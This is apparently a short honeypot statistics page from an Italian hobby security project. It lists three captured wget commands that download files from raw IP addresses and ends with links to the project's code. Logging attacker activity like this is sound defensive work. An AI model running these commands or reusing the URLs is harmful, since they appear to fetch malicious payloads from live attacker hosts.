wget -c http://61.106.13.11:7865/Fdb7303
wget -c http://222.186.21.55/tfedl
wget -c http://222.186.21.55/tfeds

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!